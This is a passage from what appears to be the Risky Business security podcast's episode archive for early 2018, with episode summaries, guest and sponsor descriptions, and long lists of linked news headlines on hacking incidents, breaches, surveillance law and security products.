It’s true that a lot of network security tech fell behind the times, but there are some fresh approaches emerging these days that are pretty bloody useful. ICEBRG started off as a product to accelerate incident response, an example use case is deploying it in 15 minutes when you’re starting an IR job; it gives you amazing visibility for the time invested. But, they’re broadening the product a bit these days. They’re not turning it in to an IDS, but they’re able to give clients some very, very high quality signalling. I think this is what you get when you get a bunch of ex-govvies and incident responders together and they develop a product. Their alerts are more along the lines of “you’re owned by this APT group” not so much “hmm, that’s some strange ICMP traffic hitting your mail server. Maybe some router in Azerbaijan needs a reboot, ."

So the thinking is definitely fresh, and I’m increasingly seeing companies play in the network security space again. Network detection is dead! Long live network detection!

Show notes ICEBRG, Inc.

Risky Business #492 -- Thomas Rid on sloppy active measures

Mar 29, 2018


Sorry this week’s show is late – I found myself taking an unexpected and unavoidable trip. But I’m back on deck and we’ve got a great show for you this week.

This week we hear from Thomas Rid, Professor of Strategic Studies at Johns Hopkins University’s School of Advanced International Studies. We’re having a conversation inspired by the latest spectacular Russian intelligence blunder: a Russian SIGINT operator exposing their GRU headquarters’ IP address because they forgot to fire up their VPN when logging in to their Guccifer 2.0 persona accounts. Oops.

It’s hilarious stuff, but it’s brought out the conspiracy types who are saying hey, as if they’d make this mistake. Something’s fishy! Well, as you’ll hear, these types of agencies make similar mistakes on a pretty routine basis. Thomas joins us to talk about that, and also about how mistakes like this don’t really matter in the broad scheme of things. They’re a bit of a distraction.

This week’s show is brought to you by Bugcrowd, the managed bug bounty company. Bugcrowd’s founder and CTO Casey Ellis will be dropping by to talk about a few things. They’ve raised a stack of cash since we last spoke and they plan to spend it on a bunch of stuff – they’re working on doing more efficient triage and they’re also looking at creating better legal agreements between their customers and their researchers. That’s all interesting stuff, and it’s coming up later.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes A cyberattack hobbles Atlanta, and security experts shudder City of Atlanta still crippled six days after ransomware attack - CNN Boeing hit by WannaCry virus, fears it could cripple some jet production | The Seattle Times EXCLUSIVE: ‘Lone DNC Hacker’ Guccifer 2.0 Slipped Up and Revealed He Was a Russian Intelligence Officer Guccifer 2.0 Was Always Sloppy - Motherboard Facebook denies it collects call and SMS data from phones without permission | TechCrunch Facebook Wants Security Researchers to Hunt Down Apps That Misuse User Data Report: Kaspersky Lab to open new data center in Switzerland to curb espionage suspicions Eugene Kaspersky defends publishing 'Slingshot' report US Charges Nine Iranians With Hacking Over 300 Universities Iranian Hackers Charged Last Week Were Actually Pretty Damn Good Phishers US Congress Passes CLOUD Act Hidden in Budget Spending Bill CLOUD Act, Tucked Into Omnibus, Likely To Derail Supreme Court Tech Privacy Case : NPR Four Alleged Associates of Sinaloa Cartel-Linked Encrypted Phone Company Are On the Run - Motherboard Secure Phone Companies Clamp Down After Sinaloa Cartel-Linked Arrest - Motherboard UK police mobile device extraction tech raises eyebrows, study FBI Barely Tried to Hack San Bernardino iPhone Before Going to Court With Apple - Motherboard FBI has a unit solely devoted to its 'going dark' problem zeynep tufekci on Twitter: "That @theintercept story about Facebook used by ICE to track immigrants that went pretty viral? It wasn't an immigrant. It was a legal subpoena on a child exploitation/abuse case. (Incredible correction at the end!!!) Motivated reasoning isn't just a right-wing phenomenon. 1/x…" Minneapolis FBI agent charged with leaking classified information to reporter | Minnesota Public Radio News How security alerts are keeping your code safer | The GitHub Blog Ecuador Cut Off Julian Assange’s Internet For His Political Tirades on Twitter - Motherboard Reddit Bans Subreddits Dedicated to Dark Web Drug Markets and Selling Guns - Motherboard NSA has been tracking bitcoin users since 2013 Angry Users Donate $120K to Cancer Research After Brian Krebs' Coinhive Article With cryptojacking rising, exploit kits rapidly decline - CyberScoop IETF Approves TLS 1.3 as Internet Standard Chrome Extension Detects URL Homograph (Unicode) Attacks Drupal Fixes Drupalgeddon2 Security Flaw That Allows Hackers to Take Over Sites Many VPN Providers Leak Customer's IP Address via WebRTC Bug Microsoft's Meltdown patches introduced a whole new vulnerability Cisco IOS XE Software Static Credential Vulnerability Digital arms merchants selling products to Australian police forces? – Digital Rights Watch fix nasty typo in CRYPTO_memcmp. · openssl/openssl@56d5a4b · GitHub Nyotron-OilRig-Malware-Report-March-2018.pdf

Snake Oilers 5 part 2: Penten talks Honey Docs, Trend Micro on its latest

Mar 26, 2018


Snake Oilers is a wholly sponsored podcast where vendors pay to pitch their tech at you, the listeners. Last week we heard from Rapid7, Mimecast and VMRay, but this week we’ve got two more pitches for you. First up we’re going to hear from Penten, an Australian based company that is doing some genuinely interesting stuff with honey documents.

Also in this edition we’ll be chatting with the team at Trend Micro. And this isn’t really about pitching a product – there more here to combat messaging coming out of newer EDR companies who are portraying established vendors like them as out of touch.

As listeners would know, beating up the incumbent AV companies is one of my hobbies, so basically Trend Micro’s Eric Skinner and Eric Shulze will be along this week to tell me why I’m an idiot. They’re also going to make a strong case for independent AV testing – it’s something the industry has struggled with for a long time, but they say they want it to happen more than ever.

Show notes Penten: Honey Docs Endpoint Security, powered by XGen™

Risky Business #491 -- The biggest infosec news week we've ever seen

Mar 21, 2018


What a week, huh? As you’ll soon hear it’s been an absolute monster week for infosec news. Top of the list is the Cambridge Analytica scandal. For those who haven’t had time to catch up on this one, a former staffer from the data analytics firm has given some interviews in which he says the company scraped 50 million Facebook profiles and used that data to target US voters with political messages on behalf of Donald Trump’s campaign. Obviously this has made people feel quite uncomfortable, everyone is mad at Facebook and it’s news everywhere.

It also looks like Facebook CSO Alex Stamos is on his way out due to events entirely unrelated to this.

Also in this week’s show we’ve got:

Iranians trying to blow up Saudi Arabian chemical plants Americans blaming Russia for attacks on its energy grid Kaspersky blowing LIVE SOCOM ops against Al Qaeda and the remnants of Islamic State The UK vowing to exact revenge on Russia via “cyber” retaliation over the Skripal affair

There is no feature interview in this week’s show, we’re going long on news, but this week’s sponsor interview is absolutely fantastic. It’s with Haroon Meer, head honcho over at Thinkst Canary.

He’s not here to talk about anything really related to products this week, instead we’re going to talk about CISO stuff. He’ll be thoughtlording the absolute sh*t out of you all this week.

Haroon thinks breached organisations are getting off too lightly in the current infosec climate because people are scared to victim shame. As you’ll hear, he thinks there’s just no excuses for how some high profile data breaches have occurred and says more CSOs should be prepared to die on the right hills to stop their companies engaging in straight up suicidal behaviour. It’s great for security to be an enabler, but that doesn’t mean signing off on whatever anyone wants to do.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes How Trump Consultants Exploited the Facebook Data of Millions - The New York Times Ron Wyden en Twitter: "I wrote a letter to Mark Zuckerberg asking @facebook to detail the extent of misuse of its users’ private information:…" Revealed: Trump’s election consultants filmed saying they use bribes and sex workers to entrap politicians – Channel 4 News Facebook told to pull auditors from Cambridge Analytica’s offices Cambridge Analytica CEO Alexander Nix Suspended Amid Scandals | WIRED Facebook Exit Hints at Dissent on Handling of Russian Trolls - The New York Times Nicole Perlroth on Twitter: "Full story publishing soon. Despite this PR-approved tweet, Stamos told hire ups he plans to leave FB in August. For the next few months, his role has been relegated to managing a small red team in SF, transitioning his group over to Guy Rosen and Pedro Canahuati, and tweeting.…" Facebook security chief Alex Stamos leaked audiotape A Cyberattack in Saudi Arabia Had a Deadly Goal. Experts Fear Another Try. - The New York Times In a first, U.S. blames Russia for cyber attacks on energy grid Russian spy attack: how likely is a British cyber offensive against Putin's regime? Adrian Lamo, ‘Homeless Hacker’ Who Turned in Chelsea Manning, Dead at 37 — Krebs on Security Kaspersky's 'Slingshot' report burned an ISIS-focused intelligence operation Telegram loses appeal over encryption keys in Russia Communications network of choice for Australian criminals shut down Child abuse imagery found within bitcoin's blockchain | Technology | The Guardian FBI raids home of suspected spy agency leaker - CNN Svitzer employee details stolen in data breach affecting almost half of its Australian employees - ABC News (Australian Broadcasting Corporation) Safari, Microsoft Edge exploits earn hackers $162k at Pwn2Own China Bans People With Low "Social Credit" From Planes and Trains

Snake Oilers #5 part 1: Rapid7 Insight Phish, VMRay's updated platform and mail filtering with Mimecast

Mar 19, 2018


As most of you know this isn’t the regular weekly show, this is a special edition we publish four times a year, and as you may have guessed from the title, this is the Risky Business podcast where vendors pay for time to pitch their products to you, the listeners.

And we’ve actually got some great pitches for you today. We’ll be hearing from Rapid7 first – they’ve developed a new addition to their Insight platform – Insight Phish. There are already so many phishing simulation tools out there, so we’ll hear from Justin Buchanan on why Rapid7 has gone down this path. He actually makes a pretty compelling argument on why they’ve bothered. Simulation is just one part of Insight Phish, the other part is response.

They’ve kind of closed the loop on that, so if you’re already a Rapid7 customer you’ll probably be VERY interested in Insight Phish. And even if you’re not it might get you looking at their stuff!

Then we’re going to hear from the team at VMRay. VMRay makes a cloud-based binary analyser for all you DFIR types. They’re a German company founded on the back of the founder’s PhD. They actually raised millions of dollars in funding in 2016 from German investors. I know I want to hear from any company that convinced Germans to invest large sums of money! They’ve released a new version of their product and they’ll be telling us a bit about that.

And finally we’re going to hear from Mimecast. And you know what? Mail filtering is a hard thing to pitch – most of the functionality is completely opaque to the user. So the Mimecast team will be along in our final pitch of the day to explain to you all what you should be asking of your email filtering provider. It’s actually really good generic advice… surprisingly neutral advice, too, so stick around for that!

Links to all our sweet, sweet Snake Oiler offerings are below!

Show notes Phishing Simulation Tool: InsightPhish | Rapid7 Get Hands on with VMRay Analyzer | VMRay Email Cloud Services in Security & Archiving | Mimecast

Risky Business #490 -- North Korea, "cyber norms" and diplomacy

Mar 14, 2018


On this week’s show we’re taking a look at how an acceleration in 24-carat bonkers state-sponsored hacking is leading to calls at senior levels of government for some actual norms to be established. We’ve got Russia hacking the planet with NotPetya, North Korea owning central banks and cryptocurrency exchanges, China owning the CCleaner supply chain and… well.. it’s all getting a bit much.

So in this week’s feature segment we’re going to zero in on one norm-breaking country, North Korea. We’ll hear from John Hultquist of FireEye and Adam Meyers of Crowdstrike on that.

As you’ll hear, countries like North Korea are pushing the limits of what they can get away with on the Internet and friendlier states are desperately trying to establish what the boundaries for good faith actors should actually be. We’ll hear from Australia’s cyber ambassador Tobias Feakin on that part of the discussion, courtesy of some audio gifted to the Risky Business podcast by Australian journalist James Riley. That’s a fun package and it’s coming up after the news.

This week’s sponsor interview is with Zane Lackey of Signal Sciences. Zane joins us to talk about a few things – how developer teams are increasingly making their own security decisions and how that’s actually a good thing… we’ll also talk about companies that have found themselves operating on multiple cloud platforms even though they didn’t plan for it.

Adam Boileau, as usual, is this week’s news guest.

We cover:

The AMD bugs China’s tightening grip on security research Slingshot APT Christopher Wray’s mind bogglingly daffy comments on key escrow AND MOAR!

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes AMD allegedly has its own Spectre-like security flaws China's government is keeping its security researchers from attending conferences China's national vulnerability database is merely a tool for its intelligence agencies China and Vulnerability Research – the grugq – Medium Cyber-enabled information and influence operations—it’s not just Russia | The Strategist How Dutch Police Took Over Hansa, a Top Dark Web Market | WIRED Crypto Exchange Offers a $250,000 Bounty for Hacker Tip-Offs - Bloomberg Victims can sue Yahoo for massive breaches, federal judge says Potent malware that hid for six years spread through routers | Ars Technica ISPs inside Turkey and Egypt spread FinFisher spyware in massive espionage campaign The FBI Director thinks this company found an answer to 'going dark' Feds Bust CEO Allegedly Selling Custom BlackBerry Phones to Sinaloa Drug Cartel - Motherboard 'Snitches Get Stitches': How Secure Phones for Criminals Are Sold on Instagram - Motherboard Olympic Destroyer: A False Flag Confusion Bomb | Threatpost | The first stop for security news Revenge Porn Moves to Slack - Motherboard CCleaner Attackers Intended To Deploy Keylogger In Third Stage | Threatpost | The first stop for security news Title Let’s Encrypt takes free “wildcard” certificates live | Ars Technica Samba Patches Two Critical Vulnerabilities in Server Software | Threatpost | The first stop for security news Cisco Prime Collaboration Provisioning Hard-Coded Password Vulnerability Any.Run - An Interactive Malware Analysis Tool - Is Now Open To The Public Tobias Feakin, Cyber Ambassador - The Next-Gen Web Protection Platform - WAF And RASP | Signal Sciences

Risky Business #489 -- (Deep) Fake News

Mar 7, 2018


On this week’s show we’re chatting with Professor of Law at the University of Maryland Danielle Citron about an article she co-authored on so-called “deep fake” videos. Citron and Bobby Chesney wrote a fascinating piece about the privacy and national security implications of this latest trend and we’ll be talking to her about that a little bit later on.

In this week’s sponsor interview we’re chatting with Julian Fay, CTO of this week’s sponsor Senetas. We talk to him about how encryption hardware industry is responding to the looming spectre of quantum computing.

As you’ll hear, standards bodies are already rolling out draft implementations of quantum-resistant algorithms that companies like Senetas will be baking into their kit as additional layers of protection.

Adam Boileau, as usual, is this week’s news guest.

We cover:

Massive memcached DDoS attacks Trustico having a bad week Reported flaws in 4G/LTE Uber breach lawsuit …and more!

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes NETSCOUT Arbor Confirms 1.7 Tbps DDoS Attack; The Terabit Attack Era Is Upon Us A 1.3-Tbs DDoS Hit GitHub, the Largest Yet Recorded | WIRED Trustico website goes dark after someone drops critical flaw on Twitter | Ars Technica 23,000 HTTPS certificates axed after CEO emails private keys | Ars Technica How do you handle mass revocation requests? - Google Groups LTE security flaws could be used for spying, spreading chaos | Ars Technica Angry Coinbase users sue over claimed security failings, insider trading | Ars Technica Chrome's WebUSB Feature Leaves Some Yubikeys Vulnerable to Attack | WIRED Pennsylvania Sues Uber Over Data Breach Disclosure | WIRED Infamous Russian Cyber-Espionage Group Hacks German Government Nuance Communications says NotPetya attack has cost it $92 million since June China’s Cyber Militias | The Diplomat the grugq on Twitter: "What happens when 80% of the reporter’s of Android bugs and half the MSFT top 100 researchers go radio silent? This will be interesting. VEP that...…" Big banks want to weaken the internet’s underlying security protocol Vulnerability Affects Half of the Internet's Email Servers Researchers Find 34,200 Vulnerable Ethereum Smart Contracts POS Malware Found at 160 Applebee's Restaurant Locations | Threatpost | The first stop for security news Thomas Rid on Twitter: "Today DHS published a remarkable 2016 FOUO document: network infrastructure devices *in US gov federal agencies* (ie Cisco routers) have been "the attack-vector of choice for advanced threat actors"—for several years. And between the lines: the attackers sometimes succeeded." Mobile Security Updates: Understanding the Issues Deep Fakes: A Looming Crisis for National Security, Democracy and Privacy? - Lawfare Google Unveils Largest Quantum Computer Yet, but So What? A Methodology for Quantum Risk Assessment - Global Risk Institute : Global Risk Institute Get Hands on with VMRay Analyzer | VMRay Bringing agility to cryptography - Senetas

Risky Biz Soap Box: Alphabet Chronicle co-founder Mike Wiacek talks Virus Total Intelligence

Mar 2, 2018


This isn’t the regular weekly show, Soap Box is the podcast where vendors pay to appear to talk about big picture stuff, or really anything they want.

Unless you’ve been living under a rock lately you’d know that Google’s parent company Alphabet announced the spinoff of an enterprise information security company. They’ve named it Chronicle, but beyond that it’s all a bit mysterious. Unlike other startups that stay super stealth until they launch their product, Alphabet basically realised that as it already has its platform out there under beta test with a bunch of organisations the creation of the company would eventually leak, and that would have been a mess from Alphabet’s point of view. So, their solution was to announce the company before it’s ready to ship its product.

I would love to tell you that they’re going to drop all the juicy details in this podcast but they’re not. They’ll drop some hints, but for now, Chronicle’s mystery platform will remain that: a mystery.

But that’s not to say there isn’t some other stuff to talk about. As a part of the spinoff, Virus Total is now a part of Chronicle. And you know what? There’s a lot more to Virus Total, in particular Virus Total Intelligence, than I realised. That’s partly because Alphabet hasn’t really done much marketing around it, and this is a kind of first step down that path.

So in this podcast you’re going to hear from two people from Chronicle – Rick Caccia who is the chief marketing officer, he’s mostly chiming in to explain a little bit about the new company – and Mike Wiacek, the CSO and co-founder of Chronicle. He’s going to be telling us about all the features of Virus Total that you probably didn’t realise exist. Did you know if you have a VTI account you can run YARA rules against everything that comes in to Virus Total? And you can apply the rules retrospectively to see what shakes out? And that they have graph and clustering features? And … and … and … you get the idea.

I hope you enjoy this podcast!

Show notes Graduation Day: Introducing Chronicle – The Team at X VirusTotal

Risky Business #488 -- Stop users recycling passwords with the pwned passwords API

Feb 28, 2018


On this week’s show we’ll chat with Troy Hunt of Have I Been Pwned. He’s released version two of his pwned password service and API. Basically it lets websites check to see if a user’s password is one that he has in his dataset. Version two allows this process to happen without users having to send over a complete password hash to HIBP.

It’s making some waves already. It’s a genuinely interesting, free service.

In this week’s sponsor interview we chat with Trail of Bits security engineer JP Smith about all thing blockchain. Trail of Bits has gotten into blockchain stuff because, hey, we’ve all heard about the many, many security issues associated with things like Ethereum smart contracts, and when it comes to blockchain and Ethereum security, well, someone has to do it.

JP will talk us through some of the bug classes he sees as well as talk about the work trail of bits has done on its dynamic binary analysis software Manticore in terms of applying it to the Etherum Virtual Machine.

Adam Boileau, as always, is this week’s news guest.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Cisco's Talos Intelligence Group Blog: Who Wasn’t Responsible for Olympic Destroyer? Winter Olympics hack shows how advanced groups can fake attribution Russia accused of “false flag” attack on Olympic opening | Ars Technica U.S. and U.K. blame Russia for infamous 'NotPetya' cyberattacks US grand jury indicts 13 Russian nationals for election meddling The Feds Can Now (Probably) Unlock Every iPhone Model In Existence Apple Tackles Cellebrite Unlock Claims, Sort Of | Threatpost | The first stop for security news Apple moves to store iCloud keys in China, raising human rights fears New SEC guidance: Please don't sell your stocks if you have insider info about a breach WhatsApp Co-Founder Brian Acton Injects $50 Million in Newly Formed Signal Foundation | WIRED | SEC Charges Former Bitcoin-Denominated Exchange and Operator With Fraud Kyle Torpey on Twitter: "The $10 Billion lawsuit against Craig Wright claims Wright used a computer-generated font called Otto to forge Dave Kleiman's signature and acquire hundreds of thousands of bitcoins." Australian 'bitcoin founder' Craig Wright accused of stealing billions of dollars worth of bitcoin Attorney General Sessions Announces New Cybersecurity Task Force | OPA | Department of Justice Jordan ⚡️ Eldredge on Twitter: "Holy moly. You can write a key logger in pure CSS. I wonder if @reddit custom themes would be vulnerable." US Border Agents Didn't Verify Any e-Passports Since 2007 Because They Didn't Have the Software In-the-wild DDoSes use new way to achieve unthinkable sizes | Ars Technica One-stop counterfeit certificate shops for all your malware-signing needs | Ars Technica A Hacker Has Wiped a Spyware Company’s Servers—Again - Motherboard Hacker Returns $26 Million Worth of Ethereum Back to Hacked Company Josh Pitts on Twitter: "I found this interesting code signing bug in macOS. I took the 2011/2012 flashback malware and 'signed' it with a cert from Apple. VirusTotal and WhatsYourSign (@patrickwardle's @objective_see tool) both agree that it's signed by Apple. I have some bug reporting to do... 🤓" Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security Flight Simulator Add-On Tried to Catch Pirates By Installing Password-Stealing Malware on Their Computers - Motherboard uTorrent vulnerabilities allow information disclosure and remote code execution People Are Blasting iOS 'Text Bombs' on Twitter to Crash iPhones - Motherboard Troy Hunt: I've Just Launched "Pwned Passwords" V2 With Half a Billion Passwords for Download Cybersecurity Enforcers Wake Up to Unauthorized Computer Access Via Credential Stuffing – Big Law Business Automated bugfinding for the blockchain - YouTube

Risky Biz Soap Box: Bugcrowd CTO Casey Ellis on bounty innovation, PII norms and defensive bounties

Feb 22, 2018


This edition of Soap Box is brought to you by Bugcrowd. So the next 40 minutes or so is a conversation between Bugcrowd CTO and founder Casey Ellis and I.

As most of you would know, Bugcrowd runs outsourced bug bounty programs for a wide variety of organisations, from Silicon Valley megabrands to financial services to development-heavy SMEs, Bugcrowd is there.

And what a time it is for the bug bounty business. There’s a lot of attention on the bug bounty concept at the moment – we even saw a senate subcommittee hearing on them take place earlier this month. It’s a competitive sector, too.

In this podcast Casey tells us about a few things, like what Bugcrowd is doing to try to add some innovation to bug bounty programs. As you’ll hear, he’s actually got some really great ideas. I came into this as a bit of a sceptic, as in, how can you innovate around something as simple as a bug bounty program? It turns out you can. We also try to make the case that bug bounties are an established part of infosec now; a boring part of the mix.

So we cover off some interesting stuff Bugcrowd is doing, then we talk about how the bug bounty provides types might be able to actually engage their crowds in defensive work.

Risky Business #487 -- Guest Katie Moussouris on her recent Senate Subcommittee testimony

Feb 15, 2018


On this week’s show we’re going to chat with Katie Moussouris about her testimony before a Senate Subcommittee last week. She fronted a session on Consumer Protection, Product Safety, Insurance, and Data Security titled, “Data Security and Bug Bounty Programs: Lessons Learned from the Uber Breach and Security Researchers. We’ll hear from her on how all that went and what she hopes the US government learned from the committee panel.

Also this week we’ll be hearing from Mark Maunder of Wordfence, that’s this week’s sponsor interview. Wordfence sells a Wordpress security plugin. There have been some interesting developments in the Wordpress world over the last week that are definitely worth covering. Wordpress actually pushed an update to core that actually disables future auto updates. Yikes.

We’ll find out how long that update was out, what percentage of the Wordpress ecosystem swallowed it, and we’ll also talk about about a couple of dysfunctional things happening in the Wordpress ecosystem.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Researchers: We Found the Olympic-Disrupting Malware - Motherboard Equifax says more private data was stolen in 2017 breach than first revealed | ZDNet How a Low-Level Apple Employee Leaked Some of the iPhone's Most Sensitive Code - Motherboard That mega-vulnerability Cisco dropped is now under exploit | Ars Technica Two Bills Introduced to Ban US Government from Using Chinese Equipment Highlights of the French cybersecurity strategy Accused “In fraud we trust” kingpin arrested while vacationing in Thailand | Ars Technica U.S. Arrests 13, Charges 36 in ‘Infraud’ Cybercrime Forum Bust — Krebs on Security From July on, Chrome will brand plain old HTTP as “Not secure” | Ars Technica Critical Telegram flaw under attack disguised malware as benign images | Ars Technica Cryptocurrency Mining Hack That Compromised Thousands of Sites ‘Could Have Been a Catastrophe’ - Motherboard BitGrail Cryptocurrency Exchange Becomes Insolvent After Losing $170 Million XRballer comments on The Stolen XRB has already been Redistributed/Sold Off ‘BuckHacker’ Search Engine Lets You Easily Dig Through Exposed Amazon Servers - Motherboard How a Tiny Startup Became the Most Important Hacking Shop You’ve Never Heard Of - Motherboard European Cops Welcome Spy Vendor That Sold to Assad Regime - Motherboard Intel releases new Spectre microcode update for Skylake; other chips remain in beta | Ars Technica Expanding Intel’s Bug Bounty Program: New Side Channel Program, Increased Awards | Intel Newsroom Microsoft Rolls Out Windows Analytics Update to Aid Meltdown & Spectre Patching Microsoft February Patch Tuesday Fixes 50 Security Issues Until last week, you could pwn KDE Linux desktop with a USB stick • The Register WordPress users – do an update now, and do it by hand! – Naked Security Atlassian Security Engineering Team Lead | SmartRecruiters Atlassian Sr. Manager of Global Security Engineering | SmartRecruiters Speakers | WordCamp Atlanta 2018 Wordfence Signup - Wordfence Data Security and Bug Bounty Programs: Lessons Learned from the Uber Breach and Security Researchers - Hearings - U.S. Senate Committee On Commerce, Science, & Transportation

Risky Business #486 -- Locking down AWS permissions with RepoKid

Feb 7, 2018


On this week’s show we’re chatting with Travis McPeak at Netflix about a tool they’ve developed called RepoKid. It automatically strips unused AWS permissions, which I’m guessing a lot of you will find quite useful.

We’ll also chat with Dan Kuykendall in this week’s sponsor interview. Dan works for Rapid7, and they’ve been doing some interesting stuff with their agents, basically tweaking them to give better visibility of application security issues and exploitation attempts. T

hat conversation is really about how security firms these days are using the agent footprint they have to just do whatever they can.

Adam Boileau, as always, pops in to discuss the week’s news. We cover the:

AutoSploit arm waving Lauri Love beating extradition Nik Cubrilovic’s arrest MOAR

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Threat or menace? “Autosploit” tool sparks fears of empowered “script kiddies” | Ars Technica Rob Joyce on Twitter: "Releasing AutoSploit, making mass exploitation even easier, was irresponsible. My friends at the FBI remind us all that while exploitation is easier, it is not any less illegal. #scriptkiddiesbeware" Lauri Love case: Hacking suspect wins extradition appeal - BBC News Young criminal hackers get assigned jobs at Dutch ICT firms | NL Times Julian Assange loses challenge to UK arrest warrant, court to rule on new bid next week - ABC News (Australian Broadcasting Corporation) Alleged Spam Kingpin ‘Severa’ Extradited to US — Krebs on Security Georgia SB 315 (The Computer Intrusion Bill) TechCrunch alumni arrested over alleged hacking of car sharing company - SiliconANGLE Trump administration wants larger role in shaping international data laws CLOUD Act Would Erode Trust in Privacy of Cloud Storage | Center for Democracy & Technology Experts push back on Trump administration's call to respond to cyberattacks with nukes Data Security and Bug Bounty Programs: Lessons Learned from the Uber Breach and Security Researchers - Hearings - U.S. Senate Committee On Commerce, Science, & Transportation Nicole Perlroth on Twitter: "Wow this Commerce Committee hearing on Uber payment is going off the rails. Blumenthal accusing Uber of aiding and abetting extortion, and a cover up. Flynn, "I agree... This is not the way we are going to do these things moving forward." Calls it "multilevel data intrusion."" Berkshire Hathaway’s Business Wire Suffers Cyberattack - WSJ Credit card ban, regulator scrutiny latest challenges for bitcoin Seoul claims North Korea stole millions worth of cryptocurrency from domestic exchanges DHS won't reverse ban on Kaspersky products, court docs show Apple, Cisco team up with cyber insurers for policy discounts Oh, banks have cameras? Two men arrested for ATM jackpotting scheme must've forgot Telegram iOS app removed from App Store last week due to child pornography | Ars Technica Hacking Team Is Still Alive Thanks to a Mysterious Investor From Saudi Arabia - Motherboard T-Mobile Is Sending a Mass Text Warning of ‘Industry-Wide’ Phone Hijacking Scam - Motherboard NSA Exploits Ported to Work on All Windows Versions Released Since Windows 2000 Covert Data Channel in TLS Dodges Network Perimeter Protection | Threatpost | The first stop for security news An Adobe Flash 0day is being actively exploited in the wild | Ars Technica In just 24 hours, 5,000 Android devices are conscripted into mining botnet | Ars Technica Bug in Grammarly browser extension exposes virtually everything a user ever writes Cisco investigation reveals ASA vulnerability is worse than originally thought Matthew Olney on Twitter: "Hey guys, I know you're excited about CVE-2018-0101 (Cisco ASA SSL VPN RCE), but even if you don't have a service contract you can obtain the update from TAC. DO NOT download and install images from anyone but Cisco. (We appreciate the help, we really do...but...just....don't)" Cyber Operations Tracker | Council on Foreign Relations Interactives Atlassian Security Engineering Team Lead | SmartRecruiters Atlassian Sr. Manager of Global Security Engineering | SmartRecruiters

Risky Business #485 -- Infosec startups overfunded, good exits unlikely

Jan 31, 2018


On this week’s show we’re checking in with Kelly Shortridge and the topic is zombies. Not the botnet kind, the heavily-VC-backed kind.

A recent report from the Reuters news agency highlighted the amount of VC pouring into the so-called “cyber” industry vs the amount of money actually coming out of it in the form of profitable exits isn’t matching up. The industry is filling up with so-called zombie companies – they’ll never exit, but they’re not going to completely die, either.

As it turns out, Kelly recently did a presentation on precisely this topic, so in this week’s feature we get her take on why this is happening and what’s likely to change. The tl;dr is something will have to give in the next couple of years, and it’s going to be ugly.

In this week’s sponsor interview we check in with Jordan Wright of Duo Security. Jordan has done some research into phishing kits. While phishing isn’t the sexiest topic, the team at Duo has actually done some pretty comprehensive research here – they looked at thousands of kits and pulled out some interesting stats.

We’ll talk to him about that, and also about the likelihood that U2F hardware will soon be baked into consumer devices. That’s really going to change things in years to come.

Adam Boileau, as always, pops in to discuss the week’s news. We cover the:

Strava heatmap Dutch infiltration of Cozy Bear Possible nationalisation of the US 5G network on security grounds Microsoft disabling Intel Spectre patches Google’s Chronicle announcement US$400m Cyptocurrency ownage MOAR

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Strava Data Heat Maps Expose Military Base Locations Around the World | WIRED Strava’s heatmap data lets anyone see the names of people exercising on military bases | WIRED UK “Heatmap” for social athlete’s app reveals secret bases, secret places | Ars Technica Dutch Spies Snooped on Russia's Elite Hackers, and More Security News This Week | WIRED To counter China, White House memo suggests a nationalized 5G network | Ars Technica Microsoft rushes Windows patch disabling Intel’s Spectre fixes due to instability Intel: Meltdown, Spectre silicon fixes coming 2018; 3D XPoint RAM, not so much | Ars Technica Chronicle: A Meteor Aimed At Planet Threat Intel? — Krebs on Security Two new cryptocurrency heists make off with over $400M worth of blockchange | Ars Technica Ethereum Startup Vanishes After Seemingly Making $11, Leaves Message: ‘Penis’ - Motherboard Now even YouTube serves ads with CPU-draining cryptocurrency miners | Ars Technica New Ads Policy: Improving Integrity and Security of Financial Product and Services Ads | Facebook Business Drugs Tripped Up Suspects In First Known ATM “Jackpotting” Attacks in the US — Krebs on Security U.S. economy could lose billions if attack shut down major cloud providers, report says DNC hires first ever CSO ahead of 2018 midterms Huawei loses another carrier deal as spying fears impede its US growth | Ars Technica DCShadow explained – Alsid blog Cisco patches a perfect 10.0 'critical' flaw in its popular security appliance Oracle issues patches for 10 'virtual machine escape' flaws in VirtualBox Under threat: Cyber security startups fall on harder times Phish in a Barrel

Risky Business #484 -- What's up with the new 702?

Jan 24, 2018


On this week’s show we’ll be taking a look at the freshly re-authorised section 702 of the FISA act. As you’ll soon hear, the updated section now allows the FBI to search data captured under 702 programs for evidence against US citizens in a bunch of circumstances, including, drum roll please, during investigations with a cyber security tilt.

The co-founder of the Lawfare blog, law professor and Associate Dean for Academic Affairs at the University of Texas Ausin, Bobby Chesney, will be along in this week’s feature to talk about all of that!

In this week’s feature interview we’re joined by Haroon Meer of Thinkst Canary. Haroon will be along to talk about the effectiveness of various honey tokens. Thinkst has been playing around with this stuff for a couple of years now, and Haroon will be joining us to talk about how they’ll will wind up being used in an enterprise context. How do you get detection canaries to scale? That’s coming up later.

Adam Boileau, as always, pops in to discuss the week’s news. It’s been a relatively calm week, but we’ve got some interesting news about botched Spectre patches and a discussion around a sensational report about Kaspersky Lab published by Buzzfeed in conjunction with Russian outlet Meduza.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

